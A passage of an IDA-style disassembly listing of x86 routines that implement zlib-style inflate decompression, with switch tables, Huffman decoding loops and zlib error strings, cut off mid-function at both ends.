mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aInvalidStoredB ; "invalid stored block lengths"
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
jmp short loc_41F59E
; ---------------------------------------------------------------------------
loc_41F601: ; CODE XREF: sub_41EF26+1A7�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov edx, ecx
sub edx, [eax]
and dword ptr [eax+4], 0
mov [eax], ecx
add [eax+8], edx
jmp short loc_41F667
; ---------------------------------------------------------------------------
loc_41F622: ; CODE XREF: sub_41EF26+242�j
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [ebx+34h], edx
loc_41F643: ; CODE XREF: sub_41EF26+806�j
push [ebp+arg_8]
jmp loc_41F7FD
; ---------------------------------------------------------------------------
loc_41F64B: ; CODE XREF: sub_41EF26+29C�j
mov eax, [ebp+arg_0]
mov ecx, edi
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
sub ecx, [eax]
and dword ptr [eax+4], 0
mov [eax], edi
add [eax+8], ecx
loc_41F667: ; CODE XREF: sub_41EF26+657�j
; sub_41EF26+6FA�j
mov ecx, [ebp+var_C]
push [ebp+arg_8]
mov [ebx+34h], ecx
jmp loc_41F854
; ---------------------------------------------------------------------------
loc_41F675: ; CODE XREF: sub_41EF26+30B�j
; sub_41EF26+596�j
mov eax, [ebp+arg_0]
push 0FFFFFFFCh
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_41F7FD
; ---------------------------------------------------------------------------
loc_41F69D: ; CODE XREF: sub_41EF26+2D0�j
; sub_41EF26+2E4�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aTooManyLengthO ; "too many length or distance symbols"
mov [ebx+20h], ecx
mov ecx, [ebp+var_4]
mov [ebx+1Ch], ecx
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edi
sub ecx, [eax]
mov [eax], edi
add [eax+8], ecx
jmp loc_41F821
; ---------------------------------------------------------------------------
loc_41F6CD: ; CODE XREF: sub_41EF26+3D2�j
cmp [ebp+var_14], 0FFFFFFFDh
loc_41F6D1: ; CODE XREF: sub_41EF26+857�j
jnz short loc_41F6E4
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 9
pop ecx
loc_41F6E4: ; CODE XREF: sub_41EF26:loc_41F6D1�j
mov eax, [ebp+arg_0]
push [ebp+var_14]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_41F7FD
; ---------------------------------------------------------------------------
loc_41F70D: ; CODE XREF: sub_41EF26+345�j
; sub_41EF26+415�j ...
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
and dword ptr [esi+4], 0
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_41F643
; ---------------------------------------------------------------------------
loc_41F731: ; CODE XREF: sub_41EF26+4F9�j
; sub_41EF26+508�j
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
mov eax, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
mov [ebx+20h], eax
mov eax, [ebp+var_4]
push 0FFFFFFFDh
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_420BB9
add esp, 14h
jmp loc_41F85E
; ---------------------------------------------------------------------------
loc_41F779: ; CODE XREF: sub_41EF26+579�j
cmp [ebp+var_14], 0FFFFFFFDh
jmp loc_41F6D1
; ---------------------------------------------------------------------------
loc_41F782: ; CODE XREF: sub_41EF26+633�j
mov dword ptr [ebx], 7
jmp short loc_41F793
; ---------------------------------------------------------------------------
loc_41F78A: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov edi, [ebp+var_10] ; jumptable 0041EF71 case 7
mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_41F793: ; CODE XREF: sub_41EF26+862�j
push [ebp+arg_8]
mov [ebx+34h], ecx
push esi
push ebx
call sub_420BB9
mov ecx, [ebx+34h]
add esp, 0Ch
cmp [ebx+30h], ecx
jz short loc_41F7CC
mov edx, [ebp+arg_0]
mov [ebx+20h], edx
mov edx, [ebp+var_4]
mov [ebx+1Ch], edx
mov edx, [ebp+var_8]
mov [esi+4], edx
mov edx, edi
sub edx, [esi]
mov [esi], edi
add [esi+8], edx
mov [ebx+34h], ecx
loc_41F7C9: ; CODE XREF: sub_41EF26+5E9�j
push eax
jmp short loc_41F7FD
; ---------------------------------------------------------------------------
loc_41F7CC: ; CODE XREF: sub_41EF26+883�j
mov dword ptr [ebx], 8
jmp short loc_41F7DD
; ---------------------------------------------------------------------------
loc_41F7D4: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov edi, [ebp+var_10] ; jumptable 0041EF71 case 8
mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_41F7DD: ; CODE XREF: sub_41EF26+8AC�j
mov eax, [ebp+arg_0]
push 1
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov [ebx+34h], ecx
loc_41F7FD: ; CODE XREF: sub_41EF26+720�j
; sub_41EF26+772�j ...
push esi
jmp short loc_41F855
; ---------------------------------------------------------------------------
loc_41F800: ; CODE XREF: sub_41EF26+4B�j
; DATA XREF: _3:off_41F863�o
mov eax, [ebp+arg_0] ; jumptable 0041EF71 case 9
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
add [eax+8], edx
loc_41F821: ; CODE XREF: sub_41EF26+687�j
; sub_41EF26+7A2�j
mov ecx, [ebp+var_C]
push 0FFFFFFFDh
mov [ebx+34h], ecx
jmp short loc_41F854
; ---------------------------------------------------------------------------
loc_41F82B: ; CODE XREF: sub_41EF26+45�j
mov eax, [ebp+arg_0] ; default
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
push 0FFFFFFFEh
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
mov ecx, [ebp+var_C]
add [eax+8], edx
mov [ebx+34h], ecx
loc_41F854: ; CODE XREF: sub_41EF26+74A�j
; sub_41EF26+903�j
push eax
loc_41F855: ; CODE XREF: sub_41EF26+6B0�j
; sub_41EF26+8D8�j
push ebx
call sub_420BB9
add esp, 0Ch
loc_41F85E: ; CODE XREF: sub_41EF26+84E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EF26 endp
; ---------------------------------------------------------------------------
off_41F863 dd offset loc_41EF78 ; DATA XREF: sub_41EF26+4B�r
dd offset loc_41F056 ; jump table for switch statement
dd offset loc_41F0C9
dd offset loc_41F1B3
dd offset loc_41F24B
dd offset loc_41F309
dd offset loc_41F4D8
dd offset loc_41F78A
dd offset loc_41F7D4
dd offset loc_41F800
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F88B proc near ; CODE XREF: sub_4201DB+21�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
push 0
push esi
push edi
call sub_41EE2E
push dword ptr [edi+28h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebp
retn
sub_41F88B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8C1 proc near ; CODE XREF: sub_41EF26+E8�p
; sub_41EF26+58C�p
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_10]
push 1Ch
push 1
push dword ptr [eax+28h]
call dword ptr [eax+20h]
add esp, 0Ch
test eax, eax
jz short loc_41F8F3
mov cl, [ebp+arg_0]
and dword ptr [eax], 0
mov [eax+10h], cl
mov cl, [ebp+arg_4]
mov [eax+11h], cl
mov ecx, [ebp+arg_8]
mov [eax+14h], ecx
mov ecx, [ebp+arg_C]
mov [eax+18h], ecx
loc_41F8F3: ; CODE XREF: sub_41F8C1+15�j
pop ebp
retn
sub_41F8C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8F5 proc near ; CODE XREF: sub_41EF26+5DE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
mov ebx, [edi+4]
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_41F92D
sub eax, edx
dec eax
jmp short loc_41F932
; ---------------------------------------------------------------------------
loc_41F92D: ; CODE XREF: sub_41F8F5+31�j
mov eax, [edi+2Ch]
sub eax, edx
loc_41F932: ; CODE XREF: sub_41F8F5+36�j
mov [ebp+var_C], eax
loc_41F935: ; CODE XREF: sub_41F8F5+E9�j
; sub_41F8F5+16E�j ...
mov ecx, [ebx]
cmp ecx, 9 ; switch 10 cases
ja loc_41FE59 ; default
jmp ds:off_41FE8B[ecx*4] ; switch jump
loc_41F947: ; DATA XREF: _3:off_41FE8B�o
cmp eax, 102h ; jumptable 0041F940 case 0
jb loc_41F9E3
cmp [ebp+var_8], 0Ah
jb loc_41F9E3
mov eax, [ebp+arg_4]
push esi
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
push edi
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
push dword ptr [ebx+18h]
movzx eax, byte ptr [ebx+11h]
push dword ptr [ebx+14h]
push eax
movzx eax, byte ptr [ebx+10h]
push eax
call sub_41FEC6
mov [ebp+arg_8], eax
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
add esp, 18h
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_41F9C0
sub eax, edx
dec eax
jmp short loc_41F9C5
; ---------------------------------------------------------------------------
loc_41F9C0: ; CODE XREF: sub_41F8F5+C4�j
mov eax, [edi+2Ch]
sub eax, edx
loc_41F9C5: ; CODE XREF: sub_41F8F5+C9�j
cmp [ebp+arg_8], 0
mov [ebp+var_C], eax
jz short loc_41F9E3
mov ecx, [ebp+arg_8]
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 7
mov [ebx], ecx
jmp loc_41F935
; ---------------------------------------------------------------------------
loc_41F9E3: ; CODE XREF: sub_41F8F5+57�j
; sub_41F8F5+61�j ...
movzx eax, byte ptr [ebx+10h]
mov [ebx+0Ch], eax
mov eax, [ebx+14h]
mov [ebx+8], eax
mov dword ptr [ebx], 1
loc_41F9F6: ; CODE XREF: sub_41F8F5+4B�j
; sub_41F8F5+12F�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 0041F940 case 1
cmp [ebp+arg_0], eax
jnb short loc_41FA26
cmp [ebp+var_8], 0
jz loc_41FD63
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_41F9F6 ; jumptable 0041F940 case 1
; ---------------------------------------------------------------------------
loc_41FA26: ; CODE XREF: sub_41F8F5+107�j
mov eax, ds:dword_423318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test ecx, ecx
mov [ebp+var_18], ecx
jnz short loc_41FA68
mov eax, [eax+4]
mov dword ptr [ebx], 6
mov [ebx+8], eax
loc_41FA60: ; CODE XREF: sub_41F8F5+18D�j
; sub_41F8F5+1A7�j ...
mov eax, [ebp+var_C]
jmp loc_41F935
; ---------------------------------------------------------------------------
loc_41FA68: ; CODE XREF: sub_41F8F5+15D�j
mov ecx, [ebp+var_18]
test cl, 10h
jz short loc_41FA84
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+4], eax
mov dword ptr [ebx], 2
jmp short loc_41FA60
; ---------------------------------------------------------------------------
loc_41FA84: ; CODE XREF: sub_41F8F5+179�j
test cl, 40h
jz loc_41FB75
test cl, 20h
jz loc_41FD75
mov dword ptr [ebx], 7
jmp short loc_41FA60
; ---------------------------------------------------------------------------
loc_41FA9E: ; CODE XREF: sub_41F8F5+4B�j
; sub_41F8F5+1D7�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 0041F940 case 2
cmp [ebp+arg_0], eax
jnb short loc_41FACE
cmp [ebp+var_8], 0
jz loc_41FD63
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_41FA9E ; jumptable 0041F940 case 2
; ---------------------------------------------------------------------------
loc_41FACE: ; CODE XREF: sub_41F8F5+1AF�j
mov eax, ds:dword_423318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 3
shr [ebp+arg_4], cl
add [ebx+4], eax
mov eax, ecx
sub [ebp+arg_0], eax
movzx eax, byte ptr [ebx+11h]
mov [ebx+0Ch], eax
mov eax, [ebx+18h]
mov [ebx+8], eax
loc_41FAF9: ; CODE XREF: sub_41F8F5+4B�j
; sub_41F8F5+232�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 0041F940 case 3
cmp [ebp+arg_0], eax
jnb short loc_41FB29
cmp [ebp+var_8], 0
jz loc_41FD63
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_41FAF9 ; jumptable 0041F940 case 3
; ---------------------------------------------------------------------------
loc_41FB29: ; CODE XREF: sub_41F8F5+20A�j
mov eax, ds:dword_423318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test cl, 10h
jz short loc_41FB6C
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+0Ch], eax
mov dword ptr [ebx], 4
jmp loc_41FA60
; ---------------------------------------------------------------------------
loc_41FB6C: ; CODE XREF: sub_41F8F5+25E�j
test cl, 40h
jnz loc_41FDAA
loc_41FB75: ; CODE XREF: sub_41F8F5+192�j
mov [ebx+0Ch], ecx
mov ecx, [eax+4]
lea eax, [eax+ecx*8]
mov [ebx+8], eax
jmp loc_41FA60
; ---------------------------------------------------------------------------
loc_41FB86: ; CODE XREF: sub_41F8F5+4B�j
; sub_41F8F5+2BF�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 0041F940 case 4
cmp [ebp+arg_0], eax
jnb short loc_41FBB6
cmp [ebp+var_8], 0
jz loc_41FD63
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_41FB86 ; jumptable 0041F940 case 4
; ---------------------------------------------------------------------------
loc_41FBB6: ; CODE XREF: sub_41F8F5+297�j
mov eax, ds:dword_423318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 5
shr [ebp+arg_4], cl
add [ebx+0Ch], eax
mov eax, ecx
sub [ebp+arg_0], eax
loc_41FBD4: ; CODE XREF: sub_41F8F5+4B�j
; DATA XREF: _3:off_41FE8B�o
mov ecx, [edi+28h] ; jumptable 0041F940 case 5
mov eax, edx
sub eax, [ebx+0Ch]
cmp eax, ecx
mov [ebp+var_10], eax
jnb short loc_41FBF9
mov eax, [edi+2Ch]
sub eax, ecx
mov [ebp+var_18], eax
loc_41FBEB: ; CODE XREF: sub_41F8F5+302�j
mov eax, [ebp+var_10]
add eax, [ebp+var_18]
cmp eax, [edi+28h]
mov [ebp+var_10], eax
jb short loc_41FBEB
loc_41FBF9: ; CODE XREF: sub_41F8F5+2EC�j
cmp dword ptr [ebx+4], 0
mov eax, [ebp+var_C]
jz loc_41FCBE
loc_41FC06: ; CODE XREF: sub_41F8F5+3C3�j
test eax, eax
jnz loc_41FC94
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_41FC36
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_41FC36
mov edx, ecx
cmp edx, eax
jnb short loc_41FC2D
sub eax, edx
dec eax
jmp short loc_41FC32
; ---------------------------------------------------------------------------
loc_41FC2D: ; CODE XREF: sub_41F8F5+331�j
mov eax, [ebp+var_14]
sub eax, edx
loc_41FC32: ; CODE XREF: sub_41F8F5+336�j
test eax, eax
jnz short loc_41FC94
loc_41FC36: ; CODE XREF: sub_41F8F5+321�j
; sub_41F8F5+32B�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_420BB9
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_41FC5B
sub eax, edx
dec eax
jmp short loc_41FC60
; ---------------------------------------------------------------------------
loc_41FC5B: ; CODE XREF: sub_41F8F5+35F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_41FC60: ; CODE XREF: sub_41F8F5+364�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_41FC8C
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_41FC89
mov edx, ecx
cmp edx, eax
jnb short loc_41FC82
sub eax, edx
dec eax
jmp short loc_41FC8C
; ---------------------------------------------------------------------------
loc_41FC82: ; CODE XREF: sub_41F8F5+386�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_41FC8C
; ---------------------------------------------------------------------------
loc_41FC89: ; CODE XREF: sub_41F8F5+380�j
mov eax, [ebp+var_C]
loc_41FC8C: ; CODE XREF: sub_41F8F5+376�j
; sub_41F8F5+38B�j ...
test eax, eax
jz loc_41FDB9
loc_41FC94: ; CODE XREF: sub_41F8F5+313�j
; sub_41F8F5+33F�j
mov ecx, [ebp+var_10]
and [ebp+arg_8], 0
mov cl, [ecx]
mov [edx], cl
inc edx
inc [ebp+var_10]
dec eax
mov ecx, [ebp+var_10]
mov [ebp+var_C], eax
cmp ecx, [edi+2Ch]
jnz short loc_41FCB5
mov ecx, [edi+28h]
mov [ebp+var_10], ecx
loc_41FCB5: ; CODE XREF: sub_41F8F5+3B8�j
dec dword ptr [ebx+4]
jnz loc_41FC06
loc_41FCBE: ; CODE XREF: sub_41F8F5+30B�j
; sub_41F8F5+469�j
and dword ptr [ebx], 0
jmp loc_41F935
; ---------------------------------------------------------------------------
loc_41FCC6: ; CODE XREF: sub_41F8F5+4B�j
; DATA XREF: _3:off_41FE8B�o
test eax, eax ; jumptable 0041F940 case 6
jnz loc_41FD50
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_41FCF6
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_41FCF6
mov edx, ecx
cmp edx, eax
jnb short loc_41FCED
sub eax, edx
dec eax
jmp short loc_41FCF2
; ---------------------------------------------------------------------------
loc_41FCED: ; CODE XREF: sub_41F8F5+3F1�j
mov eax, [ebp+var_14]
sub eax, edx
loc_41FCF2: ; CODE XREF: sub_41F8F5+3F6�j
test eax, eax
jnz short loc_41FD50
loc_41FCF6: ; CODE XREF: sub_41F8F5+3E1�j
; sub_41F8F5+3EB�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_420BB9
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_41FD1B
sub eax, edx
dec eax
jmp short loc_41FD20
; ---------------------------------------------------------------------------
loc_41FD1B: ; CODE XREF: sub_41F8F5+41F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_41FD20: ; CODE XREF: sub_41F8F5+424�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_41FD4C
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_41FD49
mov edx, ecx
cmp edx, eax
jnb short loc_41FD42
sub eax, edx
dec eax
jmp short loc_41FD4C
; ---------------------------------------------------------------------------
loc_41FD42: ; CODE XREF: sub_41F8F5+446�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_41FD4C
; ---------------------------------------------------------------------------
loc_41FD49: ; CODE XREF: sub_41F8F5+440�j
mov eax, [ebp+var_C]
loc_41FD4C: ; CODE XREF: sub_41F8F5+436�j
; sub_41F8F5+44B�j ...
test eax, eax
jz short loc_41FDB9
loc_41FD50: ; CODE XREF: sub_41F8F5+3D3�j
; sub_41F8F5+3FF�j
mov cl, [ebx+8]
and [ebp+arg_8], 0
mov [edx], cl
inc edx
dec eax
mov [ebp+var_C], eax
jmp loc_41FCBE
; ---------------------------------------------------------------------------
loc_41FD63: ; CODE XREF: sub_41F8F5+10D�j
; sub_41F8F5+1B5�j ...
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
and dword ptr [esi+4], 0
jmp short loc_41FDCB
; ---------------------------------------------------------------------------
loc_41FD75: ; CODE XREF: sub_41F8F5+19B�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidLiteral ; "invalid literal/length code"
loc_41FD82: ; CODE XREF: sub_41F8F5+4B�j
; sub_41F8F5+4C2�j
; DATA XREF: ...
mov eax, [ebp+arg_4] ; jumptable 0041F940 case 9
push 0FFFFFFFDh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_41FE7C
; ---------------------------------------------------------------------------
loc_41FDAA: ; CODE XREF: sub_41F8F5+27A�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidDistanc ; "invalid distance code"
jmp short loc_41FD82 ; jumptable 0041F940 case 9
; ---------------------------------------------------------------------------
loc_41FDB9: ; CODE XREF: sub_41F8F5+399�j
; sub_41F8F5+459�j
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
loc_41FDCB: ; CODE XREF: sub_41F8F5+47E�j
mov eax, [ebp+var_4]
push [ebp+arg_8]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_41FE7C
; ---------------------------------------------------------------------------
loc_41FDE2: ; CODE XREF: sub_41F8F5+4B�j
; DATA XREF: _3:off_41FE8B�o
cmp [ebp+arg_0], 7 ; jumptable 0041F940 case 7
jbe short loc_41FDF2
sub [ebp+arg_0], 8
inc [ebp+var_8]
dec [ebp+var_4]
loc_41FDF2: ; CODE XREF: sub_41F8F5+4F1�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_420BB9
mov edx, [edi+34h]
add esp, 0Ch
cmp [edi+30h], edx
jz short loc_41FE2E
mov ecx, [ebp+arg_4]
push eax
mov [edi+20h], ecx
mov ecx, [ebp+arg_0]
mov [edi+1Ch], ecx
mov ecx, [ebp+var_8]
mov [esi+4], ecx
mov ecx, [ebp+var_4]
mov ebx, ecx
sub ebx, [esi]
mov [esi], ecx
add [esi+8], ebx
mov [edi+34h], edx
jmp short loc_41FE7C
; ---------------------------------------------------------------------------
loc_41FE2E: ; CODE XREF: sub_41F8F5+513�j
mov dword ptr [ebx], 8
loc_41FE34: ; CODE XREF: sub_41F8F5+4B�j
; DATA XREF: _3:off_41FE8B�o
mov eax, [ebp+arg_4] ; jumptable 0041F940 case 8
push 1
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp short loc_41FE7C
; ---------------------------------------------------------------------------
loc_41FE59: ; CODE XREF: sub_41F8F5+45�j
mov eax, [ebp+arg_4] ; default
push 0FFFFFFFEh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
loc_41FE7C: ; CODE XREF: sub_41F8F5+4B0�j
; sub_41F8F5+4E8�j ...
push esi
push edi
call sub_420BB9
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_41F8F5 endp
; ---------------------------------------------------------------------------
off_41FE8B dd offset loc_41F947 ; DATA XREF: sub_41F8F5+4B�r
dd offset loc_41F9F6 ; jump table for switch statement
dd offset loc_41FA9E
dd offset loc_41FAF9
dd offset loc_41FB86
dd offset loc_41FBD4
dd offset loc_41FCC6
dd offset loc_41FDE2
dd offset loc_41FE34
dd offset loc_41FD82
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEB3 proc near ; CODE XREF: sub_41EE2E+3A�p
; sub_41EF26+5F7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push [ebp+arg_0]
mov eax, [ebp+arg_4]
push dword ptr [eax+28h]
call dword ptr [eax+24h]
pop ecx
pop ecx
pop ebp
retn
sub_41FEB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEC6 proc near ; CODE XREF: sub_41F8F5+9A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, [ebp+arg_14]
mov ecx, [esi+34h]
mov edx, [esi+1Ch]
mov eax, [edi]
mov [ebp+var_C], ecx
mov [ebp+var_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
mov eax, [esi+20h]
